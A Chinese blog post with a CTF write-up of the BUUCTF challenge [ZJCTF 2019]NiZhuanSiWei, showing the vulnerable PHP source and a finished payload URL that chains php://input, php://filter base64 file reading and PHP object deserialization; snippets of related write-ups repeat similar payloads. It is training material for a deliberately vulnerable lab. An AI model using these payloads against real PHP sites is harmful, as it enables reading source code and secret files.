[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2022-11-13 21:19:21 发布
最新推荐文章于 2022-11-13 21:19:21 发布
阅读量231 收藏
点赞数
文章标签: php 安全漏洞 web
Wuuconix wanna a girlfriend!
本文链接:https://blog.csdn.net/Cypher_X/article/details/115387172
版权

[ZJCTF 2019]NiZhuanSiWei

  • 这道题所有的考点我都了解过,甚至用来出过类似的题目,但是作者把它们套娃得非常不错,做下来感觉非常有意思!

  • 考点 includefile_get_contents 函数的利用以及 php://inputphp://filter/read=convert.base64-encode/resouce= 伪协议的利用

  • 主界面

    <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

  • 非常的简单易懂。我们可以传递三个值,首先file_get_contents($text,‘r’)的值需要等于 “welcome to the zjctf” 这要怎么做到呢?我们可不知道哪个文件里的内容恰好是这个。但是我们利用php://input伪协议来伪造内容。之前虽然听说过php://input伪协议,这还是第一次使用,涨姿势了!哦对了,这个file_get_contents还能用来使用php://filter协议 接下来会讲到。这简直就是伪协议的天堂函数!

  • 传递之后随着我们的页面上出现几个大字,说明我们闯过第一关了。

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xo16c7G4-1617289925674)([ZJCTF 2019]NiZhuanSiWei.assets/1.png)]

  • 接下来题目想让我们传递一个file变量,但是不能有flag,看来flag就是藏在flag.php里面了!既然看不了,我们就来看看这个useless.php内藏什么玄机。哦对了,include这个函数可以用来利用php://filter伪协议,这样我们就能看到useless.php的真面貌了!

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AKmsx8pJ-1617289925676)([ZJCTF 2019]NiZhuanSiWei.assets/2.png)]

  • 然后在到在线网站解一下码就行啦。

    <?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

  • 好假虎,原来里面有个类呢!怪不得index.php里的password是用用反序列的。原来include 这个 useless.php文件之后,就能反序列化这个类啦!那这个类里面有个函数,可以file_get_contents一个file,而这个恰恰是我们反序列化字符串里自己写的,那这个file必定是flag.php啊!但是这还是不行,单纯的flag.php我们无法看到flag.php的源码,这里就要用到刚才提到的知识点,file_get_contents是伪协议的天堂,我们这里再用php://filter来看flag.php就大功告成啦!最后的payload。

    http://3c30042e-78d6-49bb-9947-96aeec8253d8.node3.buuoj.cn/?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iboTY5MF-1617289925678)([ZJCTF 2019]NiZhuanSiWei.assets/3.png)]

  • 最后base64解密后得到flag

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kpvTy3HC-1617289925681)([ZJCTF 2019]NiZhuanSiWei.assets/4.png)]

  • 这道题出的真的很好!带着我复习了很多知识点。

    参考链接

    2016xctf一道ctf题目_一个码农的笔记-CSDN博客

Wuuconix
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3903
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
魔术方法总结
梦里不知身是客
12-26 9850
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
2021-09-01[ZJCTF 2019]NiZhuanSiWei
plant1234的博客
09-07 784
[ZJCTF 2019]NiZhuanSiWei 首先根据连接打开得到一个,PHP源码: 根据源码分析,我们需要GET三个参数分别是:text,file,password 首先需要检查是否对text传一个文件,并且文件内容要是welcome to the zjctf,才能进行下一步 这里涉及到一些PHP为协议: 两个配置 PHP.ini all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为: allow_url_fopen=on; 允许url里的封装协议访问文件
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1274
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
[ZJCTF 2019]NiZhuanSiWei 1
m0_62879498的博客
04-27 572
[ZJCTF 2019]NiZhuanSiWei 1 进入环境,得到源代码 观察源代码,发现: 我们需要绕过两个点 首先是 get传参 ,让text=welcome to the zjctf 在这里我们需要用到 php的伪协议 data:// data:// — 数据流读写 条件:allow_url_fopen=on;allow_url_include=on 作用:作为一个封装器对进行数据流读写 使用格式:data://text/plain,[code] eg: data://text/plain,
BUUCTF-PWN-[ZJCTF 2019]Login
最新发布
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3257
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
buuctf-[ZJCTF 2019]NiZhuanSiWei
Nothing-one的博客
11-04 373
打开之后我们就可以进行php的代码审计。我们从头开始看起。 在第一个if中我们就可以看到要满足里面的等式才可以看到file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。 这里我们如果直接将text与这段话进行等值那么我们就可以看到这个网站没有回显,也就是说我们要想办法绕过这个。 用php的伪协议也就是data://伪协议来进行漏洞利用。 这里也就说明了我绕过了。 然后我们再看下一个if语句。 因为.
每天一道ctf
whisper921的博客
11-13 849
构造:data://text/plain,welcome to the zjctf,为了绕过某些过滤,这里用到base64编码。然后有一个可控参数file,构造file=useless.php,但是针对php文件我们需要进行base64编码,否则读取不到其内容,所以构造payload:file=php://filter/read=convert.base64-encode/resource=useless.php。结果为:O:4:"Flag":1:{s:4:"file";
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 327
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
[原题复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP伪协议、数组绕过)
笑花大王
03-03 712
简介 原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/ 考察知识点:反序列化、PHP伪协议、数组绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 打开页面看到源码先审计 大致分析flag在f...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值